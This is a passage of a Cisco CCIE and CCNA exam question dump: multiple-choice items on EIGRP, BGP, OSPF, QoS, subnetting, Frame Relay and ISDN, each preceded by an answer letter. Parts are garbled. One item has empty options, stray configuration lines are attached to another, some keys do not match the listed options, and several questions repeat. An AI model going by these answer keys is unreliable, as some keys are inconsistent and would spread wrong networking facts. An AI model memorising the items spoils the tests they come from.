Claims frames are seen on the Ring.^D. There are too many late collisions.^E. IBM Spanning Tree has been enabled on the Concentrator. C #CCIE Q151 Is MTU part of the metric calculation of an EIGRP route?^A. No, never.^B. Yes, always.^C. Only if the appropriate K-value is activated.^D. Only the smallest MTU of any links along the path is used with the metric calculation. D #CCIE Q152 According to the IEEE 802.3 CSMA/CD specification, what MAC address is used for the PAUSE mechanism to inhibit the flow of frames for a specified period of time?^A. 0000^B. 0001^C. 003C^D. 0101^E. 1111 B #CCIE Q153 Using Transmission Control Protocol (TCP) encapsulation, when will the Data Link Switching (DLSW) peers go into CONNECT state?^A. When test frame broadcasts are sent.^B. When the peers finish Capabilities Exchange.^C. Never - there is no such thing as the “CONNECT” state.^D. When the CUR/ICR exchange takes place. B #CCIE Q155 What protocol is not disabled by the ‘no service tcpservers’ command?^A. Echo^B. Finger^C. Chargen^D. Discard^E. Daytime B #CCIE Q156 IEEE 802.1D describes a method to prevent the disconnection of a single end station from disrupting Spanning Tree. ^ What does the method describe?^A. Re-setting the Topology Change flag to zero (0).^B. Disabling the 801.1D Change Detection parameter.^C. Configuring the BridgeForwardDelay to 1/2 of the BridgeMaxage.^D. Using the BridgeForwardDelay timer to age out dynamic entries. B #CCIE Q157 In IP multicast networks, the Reverse Path Forward (RPF) check is primarily used to:^A. Determine which interfaces should be included in the outgoing interface list.^B. Prevent multicast traffic from looping through the network.^C. Prevent multicast traffic from being sent by unauthorized sources.^D. Establish the reverse flow path of multicast traffic from the receiver to the source. C #CCIE Q158 What is not a primary goal of Random Early Discard?^A. Minimizing packet delay jitter.^B. Avoiding global synchronization for TCP traffic.^C. 
Supporting bursty traffic without bias.^D. Avoid starvation of the lower priority queues. B,C #CCIE Q161 Both GTS and FRTS are similar in implementation, but differ in regard to:^A. GTS applies only on a per interface basis and can use access lists to select the traffic to shape.^B. For GTS, the shaping queue is weighted fair queue (WFQ). For FRTS, WFQ is not supported; instead, the queue can be a CQ, PQ or FIFO.^C. FRTS supports shaping on a per-DLCI basis, while GTS is configurable per interface or subinterface.^D. GTS works with a variety of Layer 2 technologies, including Frame Relay, ATM, Switched Multimegabit Data Service, and Ethernet. B #CCIE Q162 A new 10/100 NIC is being connected to a Catalyst 5000 switch port. ^ Which settings will result in the best connection?^A. NIC: 100 Mbps & Full-duplex Catalyst: Auto^B. NIC: Auto Catalyst: 100 Mbps & Full-duplex^C. NIC: 100 Mbps & Half-duplex Catalyst: Auto^D. NIC: 10 Mbps & Half-duplex E #CCIE Q163 PIMv2 control messages are sent using which IP protocol?^A. UDP^B. TCP^C. IGMP^D. Protocol number 109^E. Protocol number 103 C,D,E #CCIE Q164 Which examples would have an administrative distance lower than 120?^A. External EIGRP routes.^B. iBGP routes.^C. Internal EIGRP routes.^D. Static routes.^E. ISIS routes A #CCIE Q165 Which statement is true?^A. PNNI has QoS awareness and has layer two reachability support.^B. PNNI ignores QoS and supports both layer two and three routing.^C. PNNI supports redistribution of IP routes to ATM routing tables and route dampening.^D. PNNI comes up automatically when a switch is brought up, while IP routing protocols require specific configuration commands.^E. PNNI must be connected in a three-level hierarchical topology; IP does not require hierarchy. A #CCIE Q166 What is the function of the command bgp deterministic-med?^A. It makes BGP compare MEDs between different ASs.^B. It makes default metric count as the worst possible metric.^C. 
It makes default metric count as the best possible metric.^D. It reorders the entries by neighbor AS.^E. It reorders the entries by MED. A #CCIE Q167 When the interface summary command for EIGRP is used, the metric for the summarized route is derived:^A. From the component route that has the biggest metric.^B. From the component route that has the smallest metric.^C. From the interface that has the summary command.^D. From the component route which has the longest mask.^E. From the default-metric command. A #CCIE Q168 Which statements are correct?^A. Within one area of ISIS, all links must have ip router isis configured. At least one link in that area must have this command, if the IP routing is to work correctly.^B. In ISIS there is only one router responsible for originating the LSP for the LAN. It is called the pseudonode.^C. The protocol ID, found in the ip header of CLNS is type 203.^D. You can run ISIS for IP, even without configuring a NET on the router. D #CCIE Q169 Which are examples of Physical WAN interface standards?^A. EIA/TIA 232, EIA/TIA 449, RFC 1771, and V.35.^B. EIA/TIA 232, EIA/TIA 449, IEEE 802.3 and IEEE 802.5.^C. IEEE 802.3, IEEE 802.5, ISO 8648 and RFC 1771.^D. EIA/TIA 232, EIA/TIA 449, V.35, HSSI and EIA 530. C #CCIE Q170 According to the IEEE 802.3 CSMA/CD specification, which is proper signal for contact 6 of a PHY without an internal crossover MDI Signal?^A. Receive +^B. Transmit +^C. Receive –^D. Transmit – C #CCIE Q171 Which OSPF routers can originate an ASBR-summary LSA type 4?^A. Only ASBRs.^B. Only ABRs.^C. ASBRs and ABRs if they are originating indication LSAs.^D. ASBRs with the summary command for OSPF routes configured.^E. ABRs with the area-range command configured. A,C,D #CCIE Q172 Which BGP attributes are “well known”?^A. Next-hop^B. Aggregator^C. AS-path^D. Atomic-aggregate^E. MED B #CCIE Q173 BGP synchronization means:^A. 
A BGP router can only advertise an eBGP-learned route if the route is in the BGP table with a metric of 0.^B. A BGP router can only advertise an eBGP-learned route if the route is in the routing table as an IGP route.^C. A BGP router can only advertise an iBGP-learned route if the route is in the routing table of all its iBGP neighbors.^D. A BGP router can only advertise an iBGP-learned route if the route is in the BGP table but not in the routing table.^E. A BGP router can only advertise an iBGP-learned route if the route is in the routing table as an IGP route. C #CCIE Q174 A serial interface needs to support IP-based voice traffic in a strict priority queue. ^ All other traffic should be handled through the weighted fair queuing mechanism. ^ What interface level command would enable the queue for the voice traffic?^A. ip llc-queue^B. ip rtp priority^C. priority-group^D. fair-queue E #CCIE Q175 What is the EIGRP multicast flow timer?^A. The timer after which EIGRP stops forwarding multicast data traffic.^B. The timeout timer after which EIGRP retransmits, unicasting the neighbor not in CR mode.^C. The time interval between consecutive received EIGRP hello intervals.^D. The timer interval between consecutive transmitted EIGRP hello intervals.^E. The timeout timer after which EIGRP retransmits, unicasting the neighbor in CR mode. B #CCIE Q176 RTP typically uses which protocols as a transport?^A. IP/TCP^B. IP/UDP^C. IP/RTCP^D. H.323/H.245^E. None of the above. C #CCIE Q177 The first ISUP message sent by an originating node when establishing a call using Signalling System 7 is:^A. an ACM^B. an ANM^C. an IAM^D. a REL^E. A RLC C #CCIE Q179 A serial interface with flow-based WFQ is carrying 25 flows. ^ Twelve flows are marked as IP Precedence 0, ten flows are marked as IP Precedence 1, and three flows are marked as IP Precedence 5.^ Approximately how much interface bandwidth is allocated to one of the IP Precedence 5 flows?^A. 4%^B. 6%^C. 12%^D. 15%^E. 
25% A #CCIE Q180 Through how many states do two ISIS neighbors pass when building their adjacency?^A. 2: Init, Up^B. 3: Init, 2-way, Full^C. 4: Start, Loading, Synchronizing, Up^D. 5: Init, 2-way, Exstart, Exchange, Up^E. 6: Init, 2-way, Exstart, Exchange, Full D #CCIE Q181 Which of these codecs consumes the most bandwidth?^A. G.729^B. G.723^C. GSM^D. G.711^E. G.728 A #CCIE Q182 On a Full Duplex Gigabit link between a Router and a switch the collision counter is incrementing. What is the likely cause?^A. Collisions cannot occur on a Full Duplex Gigabit Link so this is either due to a bug or broken equipment.^B. The Router is receiving too much traffic and is asserting the Collision signal to be able to slow down the rate that the switch is sending traffic.^C. Both the Router and the Switch attempted to send at the same time, both detected this and then backed off and retransmitted after a random amount of time. This is not the problem.^D. The switch and the router might be running 802.1q trunking. When using 802.1q trunking, a collision is counted every time a frame comes in on an incorrect length field. A #CCNA Q. 141 Which keystroke allows IOS to complete a partial command entry? ^A: ^B: ^C: ^D: B #CCNA Q. 265 Which configuration register setting tells the router to look in NVRAM for the boot sequence? ^A: 0x42 ^B: 0x2102 ^C: 0x001 ^D: 0x2101 B #CCNA Q. 323 What is the bit pattern for the first octet of a class B network address? ^A: 0xxxxxxx ^B: 10xxxxxx ^C: 110xxxxx ^D: 1110xxxx ^E: 11110xxx A #CCNA Q. 237 What is the bit pattern for the first octet of a class A network address? ^A: 0xxxxxxx ^B: 10xxxxxx ^C: 110xxxxx ^D: 1110xxxx ^E: 11110xxx B #CCNA Q. 195 You are configuring a Frame Relay Router with subinterfaces on interface Serial 0. Which subinterface number could you use for this configuration? ^A: 1 and 2. ^B: 0.2 and 0.3 ^C: 1 and 1.1 ^D: 0.1a and 0.1b. A #CCNA Q. 208 Calculate the number of usable networks and usable hosts for the network 210.106.14.0/24. 
^A: 1 network with 254 hosts ^B: 2 networks with 128 hosts ^C: 4 networks with 64 hosts ^D: 6 networks with 30 hosts D #CCNA Q. 142 Eight stations connected to separate 10Mbps ports on a layer 2 switch will give each station how many Mbps of bandwidth? ^A: 1.25 ^B: 4 ^C: 16 ^D: 10 ^E: 60 C #CCNA Q. 50 What is the maximum length of the fast Ethernet cable 100BaseTx standard? ^A: 10 m ^B: 50 m ^C: 100 m ^D: 1000 m C #CCNA Q. 171 Which range of possible numbers do standard IPX access lists have? ^A: 100 - 199 ^B: 600 - 699 ^C: 800 - 899 ^D: 1000 - 1099 C #CCNA Q. 248 What is the range of binary values for the first octet in class B addresses? ^A: 10000000-11111111 ^B: 00000000-10111111 ^C: 10000000-10111111 ^D: 10000000-11011111 ^E: 11000000-11101111 C,D #CCNA Q. 254 Which of the following Ethernet standards can operate in full-duplex mode? (Choose two.) ^A: 10Base2 ^B: 10Base5 ^C: 10BaseT ^D: 100BaseT D #CCNA Q. 49 What is the maximum number of subnets that can be assigned to networks when using the address 172.16.0.0 with a subnet mask of 255.255.240.0? (Assume older version UNIX workstations are in use.) ^A: 16 ^B: 32 ^C: 30 ^D: 14 ^E: It is an invalid subnet mask for the Network B #CCNA Q. 95 What is the bandwidth capacity of an ISDN B channel? ^A: 16 Kbps ^B: 64 Kbps ^C: 128 Kbps ^D: 512 Kbps ^E: 1.54 Mbps D #CCNA Q. 134 Given an IP address of 172.16.2.160 and a subnet mask of 255.255.255.192, to which subnet does the host belong? ^A: 172.16.2.32 ^B: 172.16.2.64 ^C: 172.16.2.96 ^D: 172.16.2.128 ^E: 172.16.2.192 C #CCNA Q. 154 Which IP address range is allowable given an IP address of 172.37.2.56 and 28-bits of subnetting? ^A: 172.37.2.48 to 172.37.2.63 ^B: 172.37.2.48 to 172.37.2.6.2 ^C: 172.37.2.49 to 172.37.2.62 ^D: 172.37.2.49 to 172.37.2.63 ^E: 172.37.2.55 to 172.37.2.126 D #CCNA Q. 226 What is an example of a valid MAC address? ^A: 192.201.63.251 ^B: 19-22-01-63-25 ^C: 0000.1234.FEG ^D: 00-00-12-34-FE-AA A,C,D #CCNA Q. 
31 Given the network 199.141.27.0 with a subnet mask of 255.255.255.240, identify the valid host addresses. (Choose three.) ^A: 199.141.27.33 ^B: 199.141.27.112 ^C: 199.141.27.119 ^D: 199.141.27.126 ^E: 199.141.27.175 A #CCNA Q. 131 How many valid host IP addresses are available on the following network/subnetwork? 176.12.44.16/30 ^A: 2 ^B: 30 ^C: 254 ^D: 16,382 ^E: 65,534 C #CCNA Q. 238 What is the network address for a host with the IP address 201.100.5.68/28? ^A: 201.100.5.0 ^B: 2001.100.5.32 ^C: 201.100.5.64 ^D: 201.100.5.65 ^E: 201.100.5.31 ^F: 201.100.5.1 B #CCNA Q. 314 Which of the following is a subnet broadcast address for network 201.57.78.0/27? ^A: 201.57.78.33 ^B: 201.57.78.64 ^C: 201.57.78.87 ^D: 201.57.78.97 ^E: 201.57.78.159 ^F: 201.57.78.254 E #CCNA Q. 174 What is the bit length and expression form of a MAC address? ^A: 24 bits expression as a decimal number ^B: 24 bits expression as a hexadecimal number ^C: 36 bits expression as a binary number ^D: 48 bits expression as a decimal number ^E: 48 bits expression as a hexadecimal number A #CCNA Q. 114 Which network mask should you place on a class C address to accommodate a user requirement of two sub networks with a maximum of 35 hosts on each network? ^A: 255.255.255.192 ^B: 255.255.255.224 ^C: 255.255.255.240 ^D: 255.255.255.248 B #CCNA Q. 205 Which network mask should you place on a class C address to accommodate a user requirement for five networks with a maximum of 17 hosts on each network? ^A: 255.255.255.192 ^B: 255.255.255.224 ^C: 255.255.255.240 ^D: 255.255.255.248 C #CCNA Q. 259 Which of the following describes ISDN BRI service? ^A: 2d+b ^B: 23d+b ^C: 2b+d ^D: 23b+d E #CCNA Q. 196 What is the total bandwidth of all channels on a BRI circuit? ^A: 54 kps ^B: 64 kps ^C: 112 kps ^D: 128 kps ^E: 144 kps D #CCNA Q. 102 What is the distance limitation for 100BaseT? ^A: 607 ft ^B: 25 meters ^C: 1000 ft ^D: 100 meters ^E: 185 meters E #CCNA Q. 
313 Calculate the number of usable network and host addresses for 213.105.72.0/28. ^A: 62 networks and 2 hosts ^B: 6 networks and 30 hosts ^C: 8 network and 32 hosts ^D: 16 networks and 16 hosts ^E: 14 networks and 14 hosts D #CCNA Q. 284 What IP address class is multicast? ^A: A ^B: B ^C: C ^D: D ^E: E A,B #CCNA Q. 69 Which two statements about a bridge are true? (Choose two) ^A: A bridge floods multicasts. ^B: A bridge floods broadcasts. ^C: A bridge does not flood multicasts. ^D: A bridge does not flood broadcasts. C #CCNA Q. 71 Which statement about an IP network is true? ^A: A broadcast source MAC contains all zeros. ^B: A MAC address is part of the physical layer of the OSI model. ^C: MAC addresses are used by bridges to make forwarding decisions: IP addresses are used by routers. ^D: IP addresses are now a flat addressing scheme: MAC addresses use a hierarchical addressing scheme. B,C #CCNA Q. 229 Which two statements about the Frame Tagging are true? (Choose two) ^A: A Filtering table is developed for each switch. ^B: Frame Tagging defines a unique user defined ID to each frame. ^C: A unique identifier is placed in the header of each frame as it is forwarding between switches. ^D: Frame Tagging is a technique that examines particular information about each frame based on user-defined offsets. A,B #CCNA Q. 268 Which of the following statements regarding routed and routing protocols are true? (Choose two.) ^A: A routed protocol is assigned to an interface and determines the method of packet delivery. ^B: A routing protocol determines the path of a packet through a network. ^C: A routed protocol determines the path of a packet through a network. ^D: A routing protocol operates at the transport layer of the OSI model. ^E: A routed protocol updates the routing table of a router. D #CCNA Q. 267 Which of the following access list statements will deny all telnet connections to subnet 10.0.1.0/24? 
^A: access-list 15 deny tcp 10.0.1.0 255.255.255.0 eq telnet ^B: access-list 115 deny tcp any 10.0.1.0 eq telnet ^C: access-list 115 deny udp any 10.0.1.0 eq 23 ^D: access-list 115 deny tcp any 10.0.1.0 0.0.0.255 eq 23 ^E: access-list 15 deny telnet any 10.0.1.0 0.0.0.255 eq 23 D #CCNA Q. 113 Which statement should you use to deny FTP access only from Network 210.93.105.0 to Network 223.8.151.0? ^A: Access-list one deny 210.93.105.0.0.0.0.0.0 any eq ftp access-list one permit any. ^B: Access-list 100 deny tcp 210.93.105.0 0.0.0.255 223.8.151.0 0.0.0.255 eq ftp ^C: Access-list 100 deny ip 223.8.151.0 0.0.0.255 any eq ftp Access-list 100 permit ip any any ^D: Access-list 100 deny tcp 210.93.105.0 0.0.0.255 223.8.151.0 0.0.0.255 eq ftp Access-list 100 permit ip any any B #CCNA Q. 96 Which command should you use to create an IP standard access list? ^A: Access-list standard 172.16.4.13 ^B: Access-list 1 deny 172.16.4.13 0.0.0.0 ^C: Access-list 100 deny 172.16.4.13 0.0.0.0 ^D: Access-list 198 deny 172.16.4.13 255.255.255.255 B #CCNA Q. 101 A network is very congested. Currently all the devices are connected through a hub. Which solution would best decrease congestion on the network? ^A: Add a second hub ^B: Replace the hub with a router. ^C: Replace the hub with a switch. ^D: Replace the hub with a repeater. D #CCNA Q. 145 What does the command show access-list 101 list? ^A: All extended access lists. ^B: All access lists within the router. ^C: The contents of standard access list 101 ^D: The contents of extended access list 101 A,C,D,E #CCNA Q. 48 Which of the following are true regarding passwords on a Cisco router? ^A: All passwords can be encrypted. ^B: All passwords can be entered using the set-up dialogue. ^C: A password can be set before a user can enter the privileged mode. ^D: A password can be set for individual lines. ^E: TACACS or Radius password authentication can be used. A,C,D #CCNA Q. 258 What are the advantages of using the OSI layered network model? 
(Choose three) ^A: Allows multiple-vendor development through standardization of network components. ^B: Creates a list of communication rules that all companies must implement to get onto the Internet. ^C: Allows various types of network hardware and software to communicate. ^D: Prevents changes in one layer from affecting other layers, so it does not hamper development. ^E: Allows companies to develop proprietary interfaces. C #CCNA Q. 215 What are the generic parts of a network layer address? ^A: An internetwork number and a URL. ^B: A vendor code and a serial number. ^C: A network number and host number. ^D: A broadcast number and unicast number. ^E: A domain identifier and a device identifier. D #CCNA Q. 308 Which of the following is true concerning Frame Relay multipoint subinterfaces? ^A: An IP address is required on the physical interface of the central router. ^B: All routers are required to be fully meshed. ^C: All routers must be in the same subnet to forward routing updates and broadcasts ^D: Multipoint is the default configuration for Frame Relay subinterfaces. C #CCNA Q. 320 Which layer in the TCP/IP model corresponds to the OSI network layer? ^A: Application ^B: Transport ^C: Internet ^D: Network ^E: Physical D #CCNA Q. 292 Which OSI layer uses positive acknowledgement and retransmission to ensure reliable delivery? ^A: Application ^B: Presentation ^C: Session ^D: Transport ^E: Data link ^F: Physical D #CCNA Q. 252 Which OSI layer ensures reliable end-to-end delivery of data? ^A: application ^B: presentation ^C: session ^D: transport ^E: network B,C,E #CCNA Q. 249 Which of the following are TCP/IP Application layer protocols? (Choose three) ^A: ARP ^B: HTTP ^C: SMTP ^D: ETP ^E: ICMP A #CCNA Q. 274 What is the correct command to change the bandwidth of the interface to 64K? ^A: bandwidth 64 ^B: band width 64 ^C: bandwidth 64000 ^D: band width 64000 ^E: bandwidth 64K A #CCNA Q. 
108 Which command allows the user to see a system message when logging into a router? ^A: Banner MOTD ^B: Message MOTD ^C: Banner Message ^D: Message Banner B #CCNA Q. 57 Which term describes the process in which frames from one network system are placed inside the frames of another network system? ^A: bridging ^B: tunneling ^C: data-link control ^D: generic routing ^E: packet switching B #CCNA Q. 157 What does the term 'Base' refer to in 100BaseT? ^A: Cabling type ^B: Signaling type ^C: 100 mode type ^D: Spectrum used ^E: Speed category A,B,D #CCNA Q. 79 Which three are typical operational phases in a basic connection oriented network service? (Choose three) ^A: Call setup ^B: Data transfer ^C: Load Balancing ^D: Call termination ^E: Call prioritization ^F: Data segmentation ^G: Data link identification c #CCNA Q. 317 What does the word -any- mean in the following extended access list statement? access-list 101 permit ip any 192.168.69.0 0.0.0.255 eq tcp ^A: check any of the bits in the source address ^B: permit any wildcard mask for the address ^C: accept any source address ^D: check any bit in the destination address ^E: permit 255.255.255 0.0.0.0 ^F: accept any destination address B #CCNA Q. 130 Which element is used to define the rate, in bits per second, which a Frame Relay switch agrees to transfer data? ^A: Clock rate ^B: Committed information rate ^C: Local management interface ^D: Data-link connection identifier ^E: Committed rate measurement interval B #CCNA Q. 56 Which element is used to define the rate, in bits per second, that a Frame Relay switch agrees to transfer data? ^A: Clock rate (CR). ^B: Committed Information Rate (CIR) ^C: Local management interface (LMI) ^D: Data-link connection identifier (DLCI) ^E: Committed Rate Measurement Interval (CRMI) D #CCNA Q. 103 Which command sets the clock rate to 56 Kbps on serial0? 
^A: clockrate 56 ^B: clock rate 56 ^C: clockrate 56000 ^D: clock rate 56000 ^E: set clockrate 56 ^F: serial 10 clockrate 56 ^G: clock rate 56000 serial 10 C #CCNA Q. 107 Which command retrieves the configuration file from NVRAM? ^A: Config NVRAM ^B: Copy NVRAM running-config ^C: Copy startup-config running-config ^D: Copy running-config startup-config A,B,F #CCNA Q. 181 Which three commands are used to configure information into RAM on a router. (Choose three) ^A: Configure memory ^B: Configure terminal ^C: Configure overwrite ^D: Copy TFTP startup-Config ^E: Copy running-Config startup-Config ^F: Copy startup-Config running-Config A #CCNA Q. 194 Which configuration task must you complete if a remote Frame Relay Router does not support Inverse ARP? ^A: Configure static maps. ^B: Define an IP address ^C: Disable DHCP on the Frame Relay router. ^D: Configure a static route to the remote network. C #CCNA Q. 184 You just entered the following command routers(config) #line console 0 Which operation is most likely to follow? ^A: Configure terminal type ^B: Enter protocol parameters for a serial line ^C: Create a password on the console terminal line. ^D: Establish a terminal type 4 connection to a remote host. ^E: Change from configuration mode to console privilege mode. B,C #CCNA Q. 149 Which two steps are parts of the process of creating Frame Relay subinterfaces on a point-point connection? (Choose Two) ^A: Configure the router to forward all broadcast packets ^B: Remove any network address assigned to the physical interface ^C: Configure the local data-link connection identifier for the subinterfaces ^D: Partition the total committed information rate available among the subinterfaces network 192.168.1.0 255.255.255.0 network 10.2.0.0 255.255.0.0 D #CCNA Q. 235 Which sequence of actions will allow telnetting from a user's PC to a router using TCP/IP? ^A: Connect the PC's COM port to the router's console port using a straight-through cable. 
^B: Connect the PC's COM port to the router's console port using a crossover cable. ^C: Connect the PC's COM port to the router's Ethernet port using a straight-through cable. ^D: Connect the PC's Ethernet port to the router's Ethernet port using a crossover cable. ^E: Connect the PC's Ethernet port to the router's Ethernet port using a rollover cable. ^F: Connect the PC's Ethernet port to the router's Ethernet port using a straight-through cable. D #CCNA Q. 37 Which parameter must be supplied when initializing the IGRP routing process? ^A: connected network numbers ^B: IP address mask ^C: metric weights ^D: autonomous system number ^E: registered administrative id A,B,D #CCNA Q. 224 Which three functions are supported by connection oriented services? (Choose three) ^A: Connection parameters are synchronized ^B: Any loss or duplication of packets can be corrected ^C: The data packet is independently routed and the service does not guarantee the packet will be processed in order. ^D: A data communication path is established between the requesting entity and the peer device on the remote end system. C #CCNA Q. 175 Which command displays all the commands in the history buffer? ^A: control header ^B: show buffer ^C: show history ^D: show history buffer D #CCNA Q. 179 Which command loads a new version of Cisco IOS into the router? ^A: Copy flash ftp ^B: Copy ftp flash ^C: Copy flash tftp ^D: Copy tftp flash A #CCNA Q. 106 Routers that have flash memory typically have a preloaded copy of Cisco IOS software. Which command should you use to make a backup copy of the software image onto a network server? ^A: Copy Flash TFTP ^B: Save Copy TFTP ^C: Write Backup TFTP ^D: Write Backup (server-name) ^E: Copy backup 2 (server-name) C #CCNA Q. 213 You have powered on a new router and you want to create an initial configuration. Which mode should you use? ^A: Copy mode ^B: User mode ^C: Setup mode ^D: Startup mode F #CCNA Q. 
122 With one method of transmitting frames through a switch the switch receives the complete frame and checks the frame CRC before forwarding the frame. What is this transmitting method called? ^A: CSMA/CD ^B: Full duplex. ^C: Cut through. ^D: Half duplex. ^E: Fragmentation. ^F: Stored and forwarded. C #CCNA Q. 228 With one method for transporting frames through a switch, the switch checks the destination address in the frame header and immediately begins forwarding the frame. What is this frame transmission method called? ^A: CSMA/CD ^B: FULL DUPLEX ^C: CUT THROUGH ^D: HALF DUPLEX ^E: FRAGMENTATION ^F: STORE AND FORWARD C #CCNA Q. 290 Cisco IOS allows which keystroke(s) to complete the syntax of a partially entered command? ^A: Ctrl+shift+6 then x. ^B: Ctrl+Z ^C: TAB ^D: /? ^E: Shift A #CCNA Q. 105 In the setup dialogue what do the square brackets indicate? ^A: Current or default settings. ^B: Hard coded values that cannot be modified. ^C: Values entered by the administrator but not saved. ^D: Values that must be returned to NVRAM before becoming enabled. D #CCNA Q. 13 A packet is the protocol data unit for which layer of the OSI model? ^A: Data link ^B: Session ^C: Presentation ^D: Network ^E: Transport B #CCNA Q. 319 At which OSI layer is the best path to a network determined? ^A: Data Link ^B: Network ^C: Physical ^D: Presentation ^E: Session ^F: Transport A #CCNA Q. 198 What does the Frame Relay switch use to distinguish between each PVC connection? ^A: Data link connection identifier (DLCIs) ^B: CNs ^C: FECNs ^D: Local management interface LMI F #CCNA Q. 255 What is the correct order of protocol data units in data encapsulation? ^A: Data, Frame, Packet, Segment, Bit ^B: Data, Frame, Segment, Packet, Bit ^C: Data, Packet, Frame, Segment, Bit ^D: Data, Packet, Segment, Frame, Bit ^E: Data, Segment, Frame, Packet, Bit ^F: Data, Segment, Packet, Frame, Bit C #CCNA Q. 8 During encapsulation in which order is information packaged? 
^A: Data, Packet, Segment, Frame ^B: Segment, Data, Packet, Frame ^C: Data, Segment, Packet, Frame ^D: Packet, Data, Segment, frame A,B #CCNA Q. 190 Which two steps are required to configure and apply standard access list on an interface? (Choose two) ^A: Define an access list number and its parameter. ^B: Enable an interface to become part of the access list group. ^C: Define the number of access list to be supported on an interface. ^D: Copy the access list definition to each interface that will support it. A,B,C #CCNA Q. 92 Which three tasks are required to configure a dial on demand routing (DDR) Basic Rate Interface (BRI) connection? (Choose three) ^A: Define static routes. ^B: Configure the dialer information. ^C: Specify interesting traffic that can enable the link. ^D: Define DDR password to exchange when the link comes up. C #CCNA Q. 185 Which information must a router have in order to perform proper and efficient routing? ^A: Destination application of an incoming packet ^B: Number of other packets in a single flow of data ^C: Destination network address of an incoming packet ^D: Number of routers that know a path to the destination A,C #CCNA Q. 86 Your network uses a class C address of 210.10.10.0 you must now split up the network into separate subnets to handle multiple buildings separated by router. Which two steps must you take to determine the proper subnet mask for your network? (Choose two) ^A: Determine the number of separate networks required ^B: Determine how many devices will require DHCP addressing. ^C: Determine the maximum number of hosts that will be on each subnet. ^D: Determine the minimum number of hosts that will be on each subnet. ^E: Determine which router will be the IP default gateway for each subnet. D #CCNA Q. 275 Which Frame Relay feature is responsible for transmitting keepalives to ensure that the PVC does not shut down because of inactivity? ^A: DLCI ^B: BECN ^C: FECN ^D: LMI ^E: CIR ^F: de A,B,C #CCNA Q. 
94 Which three statements about Frame Relay configuration using sub interfaces are true? (Choose three) ^A: Each subinterface is configured either multi point or point to point. ^B: Any network address must be removed from the physical interface. ^C: The configuration of subinterfaces is done in router Config-(if)# mode. ^D: Frame relay encapsulation must be configured on each sub interface. A,B #CCNA Q. 83 What is the two most common request/reply pair with ICMP messages when using the ping command? (Choose two) ^A: Echo reply ^B: Echo request ^C: Source quench ^D: Fragment offset ^E: Information redirect ^F: Destination reachable ^G: Echo control message B,C #CCNA Q. 306 Which of the following are the characteristics of a Layer 2 Ethernet switch? (Choose two.) ^A: Establishes a single collision domain. ^B: Establishes multiple collision domains. ^C: Builds a dynamic MAC address mapping table ^D: Maintains a routing table ^E: Forwards unicast frames only. C,D #CCNA Q. 230 Which two physical interfaces does PPP support? (Choose two) ^A: Ethernet ^B: Token Ring ^C: Synchronous Serial ^D: Asynchronous Serial A,D #CCNA Q. 125 Which two statements are true? (Choose two) ^A: Ethernet 802.3 utilizes a half duplex method for data transfer. ^B: In a 100mbps point to point connect, a full duplex connection can provide 400mbs of data transfer. ^C: Ethernet switches can use the full duplex mode to connect multiple nodes on a single port office switch. ^D: Full duplex Ethernet takes advantage of UTP using one pair of transmission and other pair for reception. A,D #CCNA Q. 210 Which two IPX encapsulation names are correctly paired with the Cisco IOS encapsulation names? (Choose two) ^A: Ethernet_II-ARPA ^B: Ethernet_802.3-SAP ^C: Ethernet_802.2-LLLC ^D: Ethernet_SNAP-SNAP A #CCNA Q. 277 Identify the effect of Ctrl-Z? ^A: Exits back to privileged exec mode. ^B: Disconnects from the router. ^C: Aborts the ping operation. ^D: Exits privileged exec mode A,B,C,D #CCNA Q. 
64 What are four ways that Fast Ethernet compares to 10BaseT Ethernet? (Choose four.) ^A: Fast Ethernet uses the Same Maximum Transmission Unit (MTU). ^B: Fast Ethernet is based on an extension to the IEEE 802.3 specification. ^C: Fast Ethernet uses the same Media Access control (MAC mechanisms). ^D: Fast Ethernet preserves the frame format that is used by 10BaseT Ethernet. ^E: Fast Ethernet offers a speed increase one hundred times that of the 10BaseT Ethernet. A,B,C,D #CCNA Q. 188 What are true four ways that fast Ethernet that compares to 10baseT Ethernet (Choose four) ^A: Fast Ethernet uses the same maximum transmission unit (MTU). ^B: Fast Ethernet is based on an extension to the IEE 802.3 specifications. ^C: Fast Ethernet uses the same media access control MAC mechanism. ^D: Fast Ethernet preserves the frame format that is used by the 10BaseT Ethernet. ^E: Fast Ethernet uses a speed increase 100 times to that of the 10BaseT Ethernet. D #CCNA Q. 279 Which WAN technology uses high-performance digital lines and IS packet switched? ^A: FDDI ^B: ISDN ^C: ATM ^D: Frame Relay A #CCNA Q. 245 When a router boots. Which default search sequence does it use to locate the IOS software? ^A: Flash, TFTP server, ROM ^B: NVRAM, TFTP server, ROM ^C: ROM, Flash, TFTP server ^D: ROM, NVRAM, TFTP server B #CCNA Q. 35 Which method does a Cisco Catalyst switch use to identify the VLAN membership of a frame over trunked links? ^A: Frame filtering with VLAN ID ^B: Frame tagging with VLAN ID ^C: Frame filtering with trunk ID ^D: Frame tagging with trunk ID ^E: Frame filtering with VTP port ID C #CCNA Q. 240 Which WAN service would a small office (SOHO) most likely choose as a backup for leased lines? ^A: frame relay with svc ^B: dedicated serial line ^C: isdn with ddr ^D: atm D,F #CCNA Q. 66 What are the two primary operating modes for frame switching? (Choose two) ^A: Full duplex ^B: Half duplex ^C: CSMA/CD ^D: Cut through ^E: Fragmentation ^F: Store and forward A,B,D,E #CCNA Q. 
41 What are four benefits that can result from applying ISDN networking? (Choose four) ^A: Full time connectivity across the ISDN supported by Cisco IOS routing using dial on demand routing DDR ^B: Small office and home office sites can be economically supported with ISDN basic rate interface BRI services. ^C: ISDN replaces signaling system ss7 in the public switch telephone network PSTN backbone. ^D: ISDN can be used as a backup service for a lease line connection between the remote and central offices. network access servers NAS. B,C #CCNA Q. 304 Which of the following statements are true regarding full-duplex Ethernet when compared to half-duplex Ethernet? (Choose two.) ^A: Full-duplex Ethernet consists of a shared broadcast domain, while half-duplex Ethernet consists of a private broadcast domain. ^B: Full-duplex Ethernet is collision free, while half-duplex Ethernet is subject to collisions. ^C: Full-duplex Ethernet provides higher throughput than half-duplex Ethernet of the same bandwidth. ^D: Full-duplex Ethernet provides lower throughput than half-duplex Ethernet of the same bandwidth. ^E: Full-duplex Ethernet consists of a shared cable segment, while half-duplex Ethernet provides a point-to-point link. C #CCNA Q. 271 You have just finished configuring a router. The changes have been made successfully and everything is working correctly. You then save your changes and reboot the router. None of your changes are active after reboot. However, when you look at the contents of startup-config, your changes are there: Which of the following indicates the source of the problem? ^A: Hardware failure NMVRAM prevents the router from loading the configuration. ^B: Startup-config in flash is corrupt and cannot be analyzed. ^C: Router configuration register set to bypass startup configuration. ^D: Startup-config in NVRAM is corrupt and cannot be analyzed C #CCNA Q. 247 What 